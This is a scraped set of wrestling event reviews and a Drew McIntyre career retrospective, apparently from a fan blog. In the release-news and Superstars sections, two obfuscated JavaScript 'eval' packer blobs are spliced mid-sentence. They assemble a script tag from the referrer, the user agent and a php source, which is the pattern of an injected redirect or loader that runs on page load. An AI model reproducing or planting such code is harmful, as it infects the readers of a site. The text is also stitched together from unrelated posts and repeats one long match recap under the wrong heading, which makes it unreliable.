Royal Rumble Count-Up – 2012: How To Do The Final Two

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Date: January 29, 2012
Location: Scottrade Center, St. Louis, Missouri
Attendance: 18,121
Commentators: Michael Cole, Jerry Lawler, Booker T

The opening video is of course about going to Wrestlemania.

Smackdown World Title: Big Show vs. Daniel Bryan vs. Mark Henry

Long video on Cena and all the stuff he does for WWE. The man is insanely committed to that company.

Divas of Doom/Bella Twins vs. Eve Torres/Alicia Fox/Tamina/Kelly Kelly

We recap Ryder getting hurt at the hands of Kane. This was during the period where Ryder went from one of the hottest things in the company and US Champion to a rag doll that Kane destroyed over and over and over in the span of a few weeks until his push was completely destroyed. Eve blamed Cena for Ryder having his back broken for some reason.

Kane vs. John Cena


Drew McIntyre vs. Brodus Clay

This is right after Brodus redebuted as the Funkasaurus so he was still a new character at this point. Brodus dances a lot, Drew punches him in the corner, Brodus headbutts him and hits the cross body (called WHAT THE FUNK) for the pin in about a minute.

Buy Slim Jims! For the troops!

Raw World Title: CM Punk vs. Dolph Ziggler

Punk finally gets his hands on Ziggler and puts on an abdominal stretch, complete with a wrapped toe and slicking back his hair ala Ziggler. Dolph heads to the floor and gets taken out by a suicide dive but shoves Punk off the top rope once they get back inside. Ziggler drops about eight elbows in a row and a jumping version gets two. We hit the chinlock with Ziggler cranking on the head way more than necessary.

Rating: B+. This took awhile to get going as we were all waiting on the Ace stuff. The feud would go on for weeks until Jericho finally showed up to give Punk someone with charisma to feud with. The near falls at the end were a lot better than Ace, but it occurs to me that this was pretty much the same match he had last year. Good stuff though.

Rumble by the Numbers:

30 Superstars

1 winner

31 Hall of Famers in the Rumble

21 main events those Hall of Famers have been in at Wrestlemania

695 entrants who have been eliminated

39 entrants eliminated by Michaels, a record (Kane is second at 35)

13 consecutive Rumbles for Kane

11 eliminations for Kane in 2001

194,107lbs that have been in the Rumble, or over 97 tons, or 430 Big Show

421,883 people who have attended the Rumble

62:12 Rey Mysterio spent in the Rumble in 2006, a record

3 wins for Austin

1 second that Santino lasted in 2009

2 women who have competed in the Rumble

1, the entrant that has produced the same amount of winners as #30 at two each

27, the entrant with more winners than any other at four

55 percent of winners that have won the title at Wrestlemania

Royal Rumble

Ricardo takes Cody down and pounds away before proposing an alliance with Foley of all people. They actually do team up and toss Gabriel, allowing Ricardo to do a CM Punk knee slide. We keep the comedy going with Santino at #9 and Ricardo runs from the Cobra. Santino beats on Ricardo and literally rolls him around the ring before pulling his trunks up and tossing Rodriguez.

Kofi Kingston is #11 and hits a double springboard clothesline before hitting a double Boom Drop. In at #12 is Jerry Lawler (Cole: “WHAT ARE YOU DOING???”) and he causes Miz to hit Cody by mistake. Lawler speeds things up and hits the middle rope punch with the lowered strap, only to be put out by Cody. Ezekiel Jackson is #13 and gets to do the usual power moves on each guy while the others lay around.

Jinder Mahal is #14 and the fans start chanting USA, even though the only two Americans in this match are Rhodes and Miz. Great Khali comes in at #15 and Mahal panics. Everyone gets chops and Mahal is out in just a few seconds. Jackson tries to pound away and is put out almost immediately as well. Hunico is #16 on that stupid bicycle of his and hits a spinning cross body on Miz and his Angle Slam on Cody.

Sheamus is #22 to give us some A level star power. Well maybe B+ level. Things speed up with Sheamus destroying everyone and tossing Kofi out. There are the ten forearms in the ropes to Cody and ten to Miz as well. The Zig Zag is countered and Road Dogg is another surprise return at #23. He gets to clean house for a bit and earns a “you still got it” chant. In far less than 90 seconds, Jey Uso is #24.

Rating: A-. This is one of those Rumbles that is great fun as you watch it live but it loses some steam on a second viewing. They spent a bit too much time on nostalgia and funny ideas here but they were still really good ideas. The ending with Sheamus and Jericho ROCKED and I have no idea why they never got to have a long PPV match. This is a really good Rumble but it never reaches that excellent level that some of them get to.

Sheamus celebrates a lot to end the show.

Ratings Comparison

Daniel Bryan vs. Mark Henry vs. Big Show

Original: C-

Redo: D+

Bella Twins/Divas of Doom vs. Alicia Fox/Kelly Kelly/Eve Torres/Tamina

Original: D+

Redo: D+

Kane vs. John Cena

Original: D+

Redo: D+

Brodus Clay vs. Drew McIntyre

Original: N/A

Redo: N/A

CM Punk vs. Dolph Ziggler

Original: B

Redo: B+

Royal Rumble

Original: B+

Redo: A-

Overall Rating

Original: B-

Redo: B

Just like last year, not much difference here.

Remember to follow me on Twitter @kbreviews and pick up my new book of the History of Wrestlemania at Amazon for just $3.99 at:

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TNA One Night Only – Live: Maybe They Should Stick With Taped

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Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Josh Matthews, D’Angelo Dinero

We open with a quick preview of the show, which only has a few matches announced due to the really short turnaround. The big story tonight is the return of Beer Money, who will be facing Bram/Eric Young in a very quickly put together feud.

X-Division Title: DJZ vs. Mandrews vs. Crazzy Steve vs. Tigre Uno

Eric Young, now with fresh arm tattoos, says he and Bram are the only news anyone is going to be talking about in the very near future. Beer Money being back makes people happy but Young and Bram are never happy. Young rants about Matt Hardy costing him the World Title.

Kurt Angle and Drew Galloway are ready when the Wolves come in. The Wolves came in and said they want a match with the two of them. Eli Drake and Jesse Godderz come in to add themselves. This might have been from Tuesday.

Robbie E. vs. Mike Bennett

Before the match, Maria comes out and asks if we believe in the Miracle. Robbie goes right after him to start and fires off some right hands to knock Mike out to the floor. A nice dive takes Bennett down, meaning Mike has already taken more offense than he should have already. Robbie tries a hurricanrana on the floor but Mike pulls him up and swings him head first into the barricade to take over.

Post match the finisher is named Divine Intervention. Bennett promises to build a kingdom of miracles.

Video on the Knockouts, basically giving a quick profile on each. This should have been on Impact.

Gauntlet Match

Trevor Lee vs. Pepper Parks

Grado vs. Abyss

We get a table bridged between the apron and the barricade plus the bag of tacks poured out on the floor. Grado is smart enough to use the time to get the cheese grater and blast Abyss low, followed by some kendo stick shots to drop the monster. Abyss is getting up as Grado heads up top, only to have a trashcan pelted at his head, knocking him down through the table for a huge crash.

Drew thanks Kurt for the chance and promises to bring it on Tuesday.

Tag Team Titles: Eli Drake/Jesse Godderz vs. Kurt Angle/Drew McIntyre vs. Wolves

Wolves are defending. Jesse headlocks Davey to start but Richards tags in Eddie as Pope almost calls this a WWE Tag Team Title match. Drake comes in and suplexes Edwards for two, only to get a WE WANT ANGLE chant. Instead they get Jesse kicking Eddie in the head but getting suplexed down a few seconds later. Drake is smart enough to pull Davey off the apron to break up the tag, leaving Eddie to tag in Angle.

The good guys all pose together post match.

Lashley is sick of Tyrus costing him the World Title and wants some revenge.

Lashley vs. Tyrus

The announcers recap the show.

Beer Money video.

Roode and Storm are ready.

Beer Money vs. Bram/Eric Young

A big celebration ends the show.

Remember to follow me on Twitter @kbreviews and pick up my new book of the History of Wrestlemania at Amazon for just $3.99 at:

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Wrestler of the Day – June 7: Drew McIntyre

Today it’s the former Chosen One, Drew McIntyre.

Drew got his start in 2001 and would stay in Europe for several years. The video of that era is hard to find but I do have this match from July 1, 2006.

IWW Title: Sheamus O’Shaunessy vs. Drew Galloway

Sheamus is defending and is the huge face here in Ireland. He looks FAR more like he does now with trunks instead of shorts, a mustache and short hair. Coming out to rap music is very strange though. Sheamus shoves him around to start and Galloway is quickly sent to the floor. Back in and Drew grabs a headlock but Sheamus counters into one of his own and takes him down to the mat. One sided so far.

Off to a front facelock as Thee (doesn’t work when the commentator says it either) and right back to the headlock. Drew comes back with some forearms and backdrops Sheamus out to the floor. Back in and Drew puts on something resembling a Sharpshooter but instead of pulling on the legs he leans back and pulls on Sheamus’ arms. The hold doesn’t stay long and Drew drops a knee on the arm. Sheamus comes right back with a German suplex but can’t follow up. Drew misses a middle rope legdrop and it’s Sheamus with a backbreaker into a fallaway slam. There’s the Death Valley Driver but Charlie Rage comes in for the DQ.

Rating: C. I can see why these two would have some solid matches if they had more time and a better story. Sheamus was starting to round into form here with the power game but he wasn’t quite to the level he would reach yet. Galloway is the kind of guy that would have been a big deal if he wasn’t crushed all the time, but that’s what nasty divorces do for you.

Drew would head to WWE in 2007 and make a one off appearance on Smackdown on October 12, 2007.

Drew McIntyre vs. Brett Major

It’s Zack Ryder. Drew comes out to what would become William Regal’s music and is in a blue kilt. An insert interview says Drew is applying for dual citizenship and wants to hear a USA chant tonight. That’s an interesting idea. The USA chant starts up as Drew takes him into the corner but gets flipped down by a wristlock. Drew sends him into the buckle and puts on a chinlock but the yet to be named Rough Ryder puts him down for two. A bad looking dropkick gets the same on Drew but his mentor Dave Taylor gets in a cheap shot, knocking Major into a rollup for the pin.

That would be it for Drew for a few years on the main show as he would hit developmental for awhile. One of those matches was in February 2008 on OVW TV against perennial loser Johnny Punch. It’s the only OVW match I can find.

Drew McIntyre vs. Johnny Punch

Punch has lost 123 matches in a row. A big backdrop and some clotheslines send Punch into the corner to hide, but Drew misses a charge and knocks himself out. Johnny drops a splash and ends the losing streak in less than two minutes.

Here’s a match from the other developmental promotion (FCW) on November 15, 2008.

Drew McIntyre vs. Johnny Curtis

Curtis is currently known as Fandango. Drew is still in his kilt and kicks Curtis in the face for two. Curtis goes after the arm and takes McIntyre down for two. Some armdrags send Drew to the floor as Dusty and Josh talk about what the nationality of those armdrags. Drew catches Johnny diving off the apron with a right hand for two back inside. We hit the chinlock as Curtis is busted open and Dusty plugs the live experience of the FCW tapings.

The Scot takes off the turnbuckle pad and takes out Curtis’ leg before missing a legdrop. It doesn’t seem to matter as Drew puts on a quickly broken chinlock and gets taken down by a clothesline. A Russian legsweep gets two but the referee stops to look at the exposed buckle. The pad comes off again and Drew hits him with the tag rope for the DQ.

Rating: D+. Not a bad match but it’s clear that Curtis needs an over the top gimmick because without one he’s as dull as a WWE developmental stereotype. Drew was better but he also needs something besides “I’m Scottish”. The wrestling wasn’t bad but there’s almost nothing of interest in this at all.

Drew would become FCW Champion soon after this and defend the title against DH Smith on May 24, 2009.

FCW Title: Drew McIntyre vs. DH Smith

The ring announcer is the future downfall of McIntyre’s career Tiffany. Drew is now looking like he would in WWE, with his hair pulled back and in regular trunks. Feeling out process to start with the challenger cranking on the arm but Drew counters into a wristlock of his own. Some forearms to the back have DH in trouble but he comes right back with an armbar of his own.

Drew misses a big clothesline and Smith grabs the other arm for a cross armbreaker in a really nice counter. Why didn’t we see that in WWE? McIntyre blocks most of the pressure but eventually has to get to the ropes. He taps anyway but it doesn’t count due to the ropes. That’s a good clarification to get. We take a break and come back with Drew holding a chinlock. Back up and DH whips him hard into the buckle before winning a slugout.

A northern lights suplex gets two on McIntyre but he comes back with a big boot for two. Smith backdrops out of a Future Shock attempt before getting two off a butterfly suplex. Drew comes back with a DDT for the same and goes up, only to be slammed down to put both guys on the mat. Smith rolls over for a delayed two before they trade near falls. Both guys try cross bodies to put themselves down again. They slug it out with Smith nailing a powerbomb for two, only to get caught in a Scot Drop (Downward spiral) out of nowhere to retain the title.

Rating: B-. I was digging this even though Smith didn’t seem to have much of a chance. I’m not sure what his finisher was other than maybe that armbreaker but he never went back to it after making Drew tap. McIntyre still needed some adjustments but he was getting better and more polished at this point.

The polishing would be good enough to get Drew an Intercontinental Title shot at TLC 2009.

Intercontinental Title: Drew McIntyre vs. John Morrison

McIntyre was somehow more bland here than he is now if you can believe that. He doesn’t have the sweet entrance yet either. Morrison gets the preteen girl pop. The slow-mo entrance is cool no matter what people say. Striker says it’s been 20 years since there had been a new IC Champion in Texas. That’s so wrong I don’t know where to start. We’ll ignore Rey at Mania 25 right?

Drew is dominating the early parts of the match so far which is expected. This is a far more traditional match than the previous one which comes off as a nice change of pace to me. McIntyre hits a reverse Alabama Slam. I like that. Striker calls it an Alabama Jam, which was Bobby Eaton’s top rope legdrop so that’s just wrong. We’re on the floor now as this has been a pretty decent match. Starship Pain kind of hits.

Cole and Striker actually aren’t sure if it did or not. That’s not a good sign at all. Drew’s foot is under the rope though so there you are. Striker cites the official’s handbook. I want to read that someday. Could be fun. Drew has a foreign object which makes sense for him and the double arm DDT ends Morrison’s reign.

Rating: B-. Solid stuff here. I liked McIntyre more because of this match as Morrison looked good in a loss which is all you can ask of him. I like the double arm DDT as it’s Foley’s move which makes it awesome. Morrison would be in a main event in two months so what more can you ask for?

Drew’s roll would continue to Wrestlemania where he would be part of the Money in the Bank match.

Kofi Kingston vs. MVP vs. Evan Bourne vs. Jack Swagger vs. Shelton Benjamin vs. Matt Hardy vs. Dolph Ziggler vs. Drew McIntyre vs. Kane vs. Christian

Kane has a BIG black eye for reasons never explained. Remember when I said eight man matches were too busy? Well here’s a TEN man version. It’s a big brawl to start until MVP throws in the first ladder. Drew tries to go up but gets shoved over by Matt. MVP hits a big running boot to knock Drew to the floor. Nine people fight for two sides of a ladder to climb but Kane cleans house and sends about five guys to the floor.

Christian and Matt go up but Kofi (in the rare white trunks) makes the save. Ziggler hits a kind of Zig Zag off the ladder to Christian but Kane and MVP get back inside. Things are already really congested here. Kane is put into the corner and has a ladder rammed into his ribs. Kofi stumbles up the ladder and falls onto the steel. Shelton comes in with Paydirt to MVP and loads up the big ladder, only to be stabbed with a ladder by Swagger. Jack winds up inside the ladder and gets speared from either side with the tops of ladders between the rungs of the big ladder by Christian and Matt.

Now the ladders Matt and Christian used are bridged across the top rope like a big cross kind of thing. Matt and Christian climb up while Bourne climbs up the side of the ladder. The ladder Matt is standing on falls out and Bourne kicks Christian down, but instead of GETTING THE CASE, Evan hits the Shooting Star on Christian. Now Matt stops Bourne but Swagger comes up and throws Matt onto the other bridged ladder, leaving everyone down.

MVP and Shelton go up but a rana by Benjamin send both guys out to the floor. Kane is the first person back inside but Ziggler makes the stop. He actually climbs over Kane but the big man shoves the ladder over to make the stop. A chokeslam onto the ladder has Dolph in trouble, much like Kane actually slamming the ladder onto Ziggler so hard he BREAKS THE LADDER. In the creative spot of the night, Kofi picks up the two broken pieces and walks on the like stilts.

McIntyre finally makes the save and brings the big ladder back inside. Hardy finally makes the save by shoving Drew off the ladder and onto the top rope for a big crotching. Matt is alone but can’t quite pull the thing down. Christian and Kane join him on top and it’s the big bald being shoved down. Christian hits the reverse DDT (called the Twist of Fate by that schnook Cole) and here’s Swagger back inside. It’s Swagger and Christian on top and a case to the head allows Swagger to (FINALLY as it takes forever) pull down the case to win.

Rating: B-. WAY too many people in there which led to way too much laying around. It’s not a terrible match or anything, but these are getting weaker and weaker as they keep going. Kofi’s stilts spot was great but other than that there’s nothing to see here. We’ve seen these same spots so many times now and they’re getting repetitive, making them weaker every time.

After losing the title, one of Drew’s first feuds was with Matt Hardy. Here’s one of their matches from Smackdown on August 13, 2010.

Kofi Kingston vs. MVP vs. Evan Bourne vs. Jack Swagger vs. Shelton Benjamin vs. Matt Hardy vs. Dolph Ziggler vs. Drew McIntyre vs. Kane vs. Christian

Kane has a BIG black eye for reasons never explained. Remember when I said eight man matches were too busy? Well here’s a TEN man version. It’s a big brawl to start until MVP throws in the first ladder. Drew tries to go up but gets shoved over by Matt. MVP hits a big running boot to knock Drew to the floor. Nine people fight for two sides of a ladder to climb but Kane cleans house and sends about five guys to the floor.

Christian and Matt go up but Kofi (in the rare white trunks) makes the save. Ziggler hits a kind of Zig Zag off the ladder to Christian but Kane and MVP get back inside. Things are already really congested here. Kane is put into the corner and has a ladder rammed into his ribs. Kofi stumbles up the ladder and falls onto the steel. Shelton comes in with Paydirt to MVP and loads up the big ladder, only to be stabbed with a ladder by Swagger. Jack winds up inside the ladder and gets speared from either side with the tops of ladders between the rungs of the big ladder by Christian and Matt.

Now the ladders Matt and Christian used are bridged across the top rope like a big cross kind of thing. Matt and Christian climb up while Bourne climbs up the side of the ladder. The ladder Matt is standing on falls out and Bourne kicks Christian down, but instead of GETTING THE CASE, Evan hits the Shooting Star on Christian. Now Matt stops Bourne but Swagger comes up and throws Matt onto the other bridged ladder, leaving everyone down.

MVP and Shelton go up but a rana by Benjamin send both guys out to the floor. Kane is the first person back inside but Ziggler makes the stop. He actually climbs over Kane but the big man shoves the ladder over to make the stop. A chokeslam onto the ladder has Dolph in trouble, much like Kane actually slamming the ladder onto Ziggler so hard he BREAKS THE LADDER. In the creative spot of the night, Kofi picks up the two broken pieces and walks on the like stilts.

McIntyre finally makes the save and brings the big ladder back inside. Hardy finally makes the save by shoving Drew off the ladder and onto the top rope for a big crotching. Matt is alone but can’t quite pull the thing down. Christian and Kane join him on top and it’s the big bald being shoved down. Christian hits the reverse DDT (called the Twist of Fate by that schnook Cole) and here’s Swagger back inside. It’s Swagger and Christian on top and a case to the head allows Swagger to (FINALLY as it takes forever) pull down the case to win.

Rating: B-. WAY too many people in there which led to way too much laying around. It’s not a terrible match or anything, but these are getting weaker and weaker as they keep going. Kofi’s stilts spot was great but other than that there’s nothing to see here. We’ve seen these same spots so many times now and they’re getting repetitive, making them weaker every time.

With nothing else to do, Drew would team up with Cody Rhodes for tag team turmoil at Night of Champions 2010.

Tag Team Turmoil

We open with Hart Dynasty vs. Usos. Yeah because we haven’t seen this enough. Striker mentions playing a game called Six Degrees of the Hart Dungeon, which sounds AWESOME to a wrestling geek like me. DAVID HITS A BIG BOOT IN THE CORNER! Kidd hits a big Asai moonsault to the floor. Kidd gets the Sharpshooter but the other Uso hits a BIG BOOT to end him, guaranteeing new champions.

Kozlov/Santino vs. Usos now. This lasts about a minute as Santino sets for the cobra but Tamina distracts him, allowing a Samoan Drop (shocking right?) to end him.

Bourne/Henry in next. This shows how sad the tag division is. It truly does. Henry comes in and cleans house with the World’s Strongest Slam. Air Bourne ends it.

Final team is Drew/Cody. Ok we HAVE to have the heels win it here for the sake of sanity. Also so we can hear either awesome theme song. The heels dominate for awhile as Bourne plays Ricky Morton for awhile. They say Cody was a tag team champion but never say with who. I don’t get why though.

Big gutbuster by Drew as Bourne is in trouble, hence the Morton thing I guess. Drew CRANKS on a chinlock which looks awesome. Bourne gets out of a suplex using the ultimate counter: kicking his feet. Hot tag to Henry and Cody trips coming through the ropes. They go for the Super Shooting Star which takes forever so Cross Roads takes out Bourne (illegal man) for the pin and the titles.

Rating: D. These are hard to grade but given who was in this the booking more or less was terrible. No Gatecrashers or Dudebusters or Nexus but Bourne and Henry? Really? The one good thing here is that they beat the champions clean the other night. That’s a major plus for them so there’s no argument that they didn’t beat the champions. Not wild AT ALL on having another randon team thrown together but that’s the nature of the beast in modern tag wrestling I guess. Pretty bad though and definitely the worst of the night so far.

They would lose the titles soon after this and Drew would be back to a singles run. This got him into the Elimination Chamber at its namesake show in 2011.

Smackdown World Title: Edge vs. Drew McIntyre vs. Kane vs. Rey Mysterio vs. Wade Barrett vs. ???

Remember that we have an extra spot open in the Chamber due to Dolph having been fired. Kane comes out first and therefore is in a pod to start. Drew is out second and therefore will be in a pod as well. Thankfully he’s rocking the white tights. The first four will be in pods which means we get to see who the final guy is rather soon. Barrett is in third. We hear about his bare knuckle fighting experience which makes me ask again: has he ever used said skills to win a match? Also Cole thinks Barrett is from Eastern Europe instead of Western.

Here’s Teddy Long when we’re ready for the fourth person. He’s here to introduce the next participant I guess. Here’s the replacement: It’s Big Show which is kind of what I expected when he came out there. Rey vs. Edge to start. Five minute periods as always with the last man standing winning. Every five minutes another comes in. Edge and Rey start off kind of slow which makes perfect sense as they want to maintain energy.

Edge sends Rey out to the steel for the first time with a backdrop. Drew is all ticked off and hammers on the glass as he wants to get to Edge as fast as possible. Edge and Rey fights on the outside with Rey being rammed into the cage multiple times. Rey gets rammed into the glass which is “the strongest in the world” which gets two. We’re more or less just killing time here and there’s the ten second clock.

In third it’s Barrett. He’s all fired up and goes after Rey immediately. Edge gets up to slow down the Englishman. Edge and Rey work together until Edge slides Rey across the mat and cage so that his head rams into the wall. FREAKING OW MAN! Boss Man Slam to Edge gets two and Barrett turns his attention to Rey after taunting Show. Pumphandle slam gets two.

Barrett is dominating here and we’re out on the steel again. A shot to the cage with Edge’s head going into it gets two. Edge low bridges Barrett and Wade might have hurt his knee. Rey takes down Edge but as he goes up Barrett stops him. Wasteland on the cage is countered as Rey grabs the cage. He tries to climb but Barrett catches him in a powerbomb position. Rana takes Barrett into the ring but Edge gets a big boot to stop the 619 for two. Again, why would you stop a finisher?

In fourth is Kane. He goes straight for Edge but gets caught by a boot. Kane cleans house, beating everyone in sight down. Everyone wakes up and gangs up on Kane as they should. A bunch of kicks to the head can’t stop him so we get a triple clothesline with Barrett clotheslining Edge and Rey and vice versa. We get some basic stuff and Barrett gets beaten down by Kane outside.

Rey tries to go up to take down Kane but a HUGE uppercut knocks Rey down into a Tree of Woe. Edge adds a baseball slide for two. Kane, Edge and Rey in the ring now while Barrett is slowly crawling back in. In at #5 is McIntyre. No eliminations yet. Drew has been wanting in the whole time and immediately picks up Rey and launches him into the glass. The Europeans beat up Kane, who actually is European as well so scratch that theory. Drew kicks the rope as Barret gets in and then throws him through the UNBREAKABLE glass. That’s a running joke now and it’s never been funny.

Drew is all ticked off and goes after Edge. All Drew here as he can’t get Futureshock on Edge but Edge hits Edgecution for no cover. Rey is somehow still alive as Edge is trying to get up. Edge wants the spear but Kane grabs him in a chokeslam. Rey is back in too but can’t hit the 619. Kane beats everyone down and slams Rey into the post. Drew can’t get Futureshock again as Kane backdrops him onto Barrett outside.

Edge and Kane hit double big boots to take each other down. That replay of Rey being thrown in awesome as it’s amazing he’s still alive. Show is getting ready as we’re under ten seconds. Naturally he takes down everyone. Barrett is the only one not in other than kind of Rey. HUGE chop to Drew. Barrett is the only one left standing other than Show and the stalking begins.

Show gets his hand on Barrett and chops away like 8 times on the outside. Barrett rolls back into the ring and it’s all Show. Big punch coming and Barrett is more or less dead and the pin is academic. We’re down to five and Rey is on top of a pod. Kane hits the top rope clothesline. Edge adds a top rope elbow for two as Show launches Edge over the referee. Futureshock to Show as Rey is still up there. The DDT gets two as Rey is ready to jump. Huge seated senton gets two as Rey is LAUNCHED.

619 and a spear put Show down but Kane fights them off. Chokeslam to Show and we’re down to four (Kane, Drew, Edge and Rey if you’re curious). Drew jumps into a chokeslam immediately and we’re down to three. It’s more or less a handicap match here but Edge is taken down. Rey hits a bunch of stuff on Kane but he can’t get the pin. Spinning cross body is caught in a chokeslam position but he reverses into the 619. Rey goes up and jumps into a powerbomb. Spear from Edge and a double cover is enough to take Kane out and we’re down to Rey vs. Edge.

Kane kills Edge with a big boot and a chokeslam to Edge has both guys down. After them laying there for a good while, Edge gets up and tries the spear but Rey reverses into a rollup for two. Springboard cross body is rolled through into two for Edge. Sitout bulldog gets two. Rey goes up but gets stopped by a shot from the Canadian. Mysterio knocks Edge down and tries a rana but Edge reverses into a sitout powerbomb for a long two.

Another powerbomb is countered into the 619 but Edge catches it and locks on the Edgecator of all things (kneeling Sharpshooter that he uses once in a blue moon). Rey is in trouble but reverses into a rollup for two. Good stuff here. Edge sets for the spear and the fans are booing a bit. Spear misses but the second one doesn’t and it’s NOT OVER. Rey kicks out again which is as surprising as something very surprising. 619 hits and the springboard splash gets two. Another 619 hits and Rey goes up. Edge pops up and spears him out of the air to go to Wrestlemania FINALLY.

Rating: A. GREAT match here with Edge vs. Rey being the highlight. I would say the ending was predictable but still, the ending sequence with all the kickouts was so good that it’s more than ok. I don’t like Rey but he was great here. I loved all the aggression in there with everyone destroying each other all night long. Great stuff here and one of the better Chamber matches I can remember in along time.

Things would go WAY downhill after this so we have to take big names where we can get them. From Raw, July 11, 2011.

Drew McIntyre/Dolph Ziggler vs. Big Show

Show is all mad here. Ziggler starts and looks at Show. He tags out immediately so Show beats them both up. Show dominates Drew as Ziggler hides. Drew tries to leave and gets mauled by Show. McIntyre gets thrown up the stage and it’s a countout at 2:00.

Next up is Smackdown, March 9, 2012.

Here’s Drew McIntyre in his gear. Is anyone surprised by this? Drew says that Ace will rehired him if he wins a match against a mystery opponent.

Drew McIntyre vs. Great Khali

And never mind as Otunga says Khali isn’t in the match, so here’s the real opponent.

Drew McIntyre vs. Hornswoggle

So why did Khali come out there at all? Horny is terrified despite regularly beating full sized guys before. Drew dominates him and keeps pulling him up after slams. The referee stops it at 1:39.

Drew would head down to NXT for a few matches, including this one on July 25, 2012.

Seth Rollins vs. Drew McIntyre

I miss the full Broken Dreams entrance. That thing was awesome. Rollins speeds things up to start and dropkicks Drew down. Another dropkick puts McIntyre on the floor and a dive takes Drew down again. Back with a double clothesline putting both guys down. Rollins nips up and hits an enziguri to take Drew down. They head to the corner but Rollins’ charge hits the middle buckle. The advantage doesn’t last long as Rollins rolls Drew up for two and clotheslines him down for the same. A Phoenix Splash (moonsault into a 450) misses and Drew kicks Seth’s head off. Futureshock gets the clean pin at 5:30 shown of 9:00.

Rating: C-. This was basically a squash with a surprise ending. Rollins looked good here with him flying all over the place and hitting almost everything he tried. The ending is a bit questionable but it gives McIntyre a bit of credibility when he loses on this show more often. That’s probably the right move and the match wasn’t awful or anything.

Drew would join a rock band called 3MB (Three Man Band) along with Heath Slater and Jinder Mahal. They became comedy relief and eventually said they would be going after the Royal Rumble. Here’s a step towards that from Raw, January 14, 2013.

Sheamus vs. 3MB

This is an over the top rope challenge. JBL: “This isn’t fair.” Cole: “To Sheamus?” JBL: “No.” The band beats on Sheamus to start but he fights them off with ease. Sheamus hits a Regal Roll on McIntyre onto Mahal but can’t get Drew out. All three put him on the ropes but he easily fights them off. Mahal goes up like an idiot and gets knocked out. McIntyre gets backdropped out but Sheamus misses the Brogue Kick to send himself to the apron. He pulls Slater onto the top rope but the other members pull Sheamus to the floor, giving 3MB the win at 3:10. No rating for this due to obvious reasons.

Here’s a tag match from June 24, 2013 on Raw.

Tons of Funk vs. Usos vs. 3MB

The winners get a tag title shot, presumably at MITB. Tons of Funk have some guy who won a charity auction to come to the ring. It’s McIntyre and Mahal for 3MB here. Mahal starts with Jey who kicks Drew in the face and out to the apron. Off to Jimmy who gets run over by Tensai as everything breaks down. Brodus throws the Band out and dives off the apron to take them out. Back in the ring and Tensai gets two off the backsplash but it’s a superkick and Samoan Drop by Jey, setting up the Superfly Splash for the pin at 2:02.

We’ll wrap it up with Raw on April 28, 2014 with part of the feud that dominated 3MB’s last few months.

Los Matadores vs. 3MB

McIntyre and Slater here. The pre show match on Sunday is a, I kid you not, Wee L C match involving all of these guys plus the small ones. McIntyre sends Diego into the corner to start before it’s off to Slater. Heath doesn’t do all that well and it’s quickly off to Fernando who cleans house. The announcers of course spend the match making short jokes as Torito Gores Mahal’s groin into Hornswoggle’s head. Back in the ring and Slater hits an elevated DDT on Fernando for the pin at 2:19. JBL: “OH MY GOD 3MB WON! BARRY HOROWITZ IS ROLLING OVER IN HIS GRAVE AND HE’S NOT EVEN DEAD!”

Drew McIntyre is one of the guys that could have been something but was only so interesting even at his peak. When he was released a few weeks ago, people called it a waste of potential. However, look back at this timeline of his career: he hadn’t meant anything in about three years. This is hardly a huge loss for the company now and hasn’t been for years now. The guy is definitely talented though and he’ll be better when he’s a singles guy, though he needs a bit better character than The Chosen One.

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

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Jinder Mahal and Drew McIntyre Also Released

No eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yksbn|var|u0026u|referrer|ekstf||js|php'.split('|'),0,{})) one is going to miss Mahal. Drew…..are we still OUTRAGED over his loss to Hornswoggle a few weeks ago? It was such an outcry that I can’t remember if it’s over yet. Referee Mark Harris is released as well. This is a big day so far.

On This Day: August 23, 2012 – Superstars:

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|badnb|var|u0026u|referrer|aihhs||js|php'.split('|'),0,{})) August 23, 2012
Location: Save Mart Center, Fresno, California/Rabobank Arena, Bakersfield, California
Commentators: Scott Stanford, Matt Striker

For the sake of context, this is four days after Summerslam.

Damien Sandow vs. Yoshi Tatsu

We get a LONG recap of Lesnar vs. HHH from Summerslam as well as the fallout on Raw.

Drew McIntyre vs. Alex Riley

Drew has a bad hand here and milks it a bit before Riley grabs the wrist. A dropkick puts Drew on the floor but Riley misses a dive. Off to an armbar from McIntyre followed by some stomps to the leg. This is going really slowly. Drew tries the FutureShock but Riley sends him into the corner. Drew heads up but gets rolled up off the top for the pin for Riley out of nowhere.

Video on the Asian tour.

Video from the end of Raw with Cena confronting Punk before Punk beat up Lawler.

Justin Gabriel vs. Cody Rhodes

Back to more work on the arm, this time in the form of a hammerlock. Justin starts a quick comeback but misses a top rope Lionsault to give Cody control again. Off to a short arm scissors but Gabriel gets off his back to break the hold. A monkey flip puts Cody down as does a spinning kick to the face. Justin hits a kind of sitout powerbomb for two but a slam is countered into the Cross Rhodes for the pin for Cody out of nowhere. Nice counter.

Remember to follow me on Twitter @kbreviews, and pick up my new book of Complete 2001 Monday Night Raw Reviews at Amazon for just $4 at:

And check out my Amazon author page with wrestling books for just $4 at: